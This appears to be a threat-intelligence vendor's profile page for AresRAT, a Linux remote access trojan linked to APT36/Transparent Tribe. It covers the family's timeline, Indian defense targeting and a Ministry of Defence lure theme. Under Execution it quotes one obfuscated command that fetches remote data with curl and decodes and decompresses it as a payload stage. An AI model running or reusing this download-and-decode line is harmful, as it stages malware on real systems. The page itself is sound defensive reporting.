AresRAT
AresRAT is a remote access trojan associated with Transparent Tribe / APT36 (also tracked as Mythic Leopard, and in related reporting via SideCopy/TAG-140 overlap). The provided content places it within the group’s malware rotation and specifically identifies it as a Linux-oriented family used after Poseidon and before DeskRAT, with one timeline describing it as appearing in October 2025 as a Python PyInstaller ELF. Reporting also lists AresRAT among numerous RATs leveraged by the cluster alongside CurlBack, SparkRAT, Xeno RAT, AllaKore, ReverseRAT, GetaRAT, Poseidon, DeskRAT, and DRAT variants. The broader activity tied to this malware family targets Indian entities, especially defense-related, military, government, diplomatic, education, and other defense-adjacent sectors. High-confidence details in the content about AresRAT itself are limited to its classification as a RAT, its use by APT36/Transparent Tribe-linked operations, and its role in the actor’s Linux malware evolution; no specific infection chain, command-and-control protocol, or standalone indicators of compromise for AresRAT are directly provided in the source content.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
RAT-family-rotation timeline: CrimsonRAT (Feb 2024 – Feb 2025, Windows) → Poseidon (Aug 2024, Linux ELF) → AresRAT (Oct 2025, Python PyInstaller ELF) → DeskRAT (Oct 2025 – present, Go ELF).
"...including CurlBack, SparkRAT, AresRAT, Xeno RAT, AllaKore, and ReverseRAT."
Techniques & procedures
4 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniquesThe current lure is themed as Ministry of Defence procurement of indigenous trawl assemblies for T-72 and T-90 main battle tanks — a plausible-enough artifact for a defense-contracting inbox to open without hesitation.
The current lure is themed as Ministry of Defence procurement of indigenous trawl assemblies for T-72 and T-90 main battle tanks ... a plausible-enough artifact for a defense-contracting inbox to open without hesitation.
Execution
1 techniquecurl ${YAiuradJ} ${JOsQTdyK} | python3 -c 'import base64,sys; sys.stdout.buffer.write(base64.a85decode(sys.stdin.read()))' | bzip2 -d
Stealth
1 techniqueThe current lure is themed as Ministry of Defence procurement of indigenous trawl assemblies for T-72 and T-90 main battle tanks — a plausible-enough artifact for a defense-contracting inbox to open without hesitation.
IOCs tracked for this family
4 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A Python/PyInstaller-based Linux ELF RAT used by APT36 prior to DeskRAT. The report notes samples compiled with PyInstaller and carrying Python runtime artifacts.
RAT family listed as part of APT36/Transparent Tribe’s historical malware arsenal; no additional technical detail provided in the text.
"...including CurlBack, SparkRAT, AresRAT, Xeno RAT, AllaKore, and ReverseRAT."
Remote access trojan referenced as part of TAG-140’s rotating malware arsenal.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.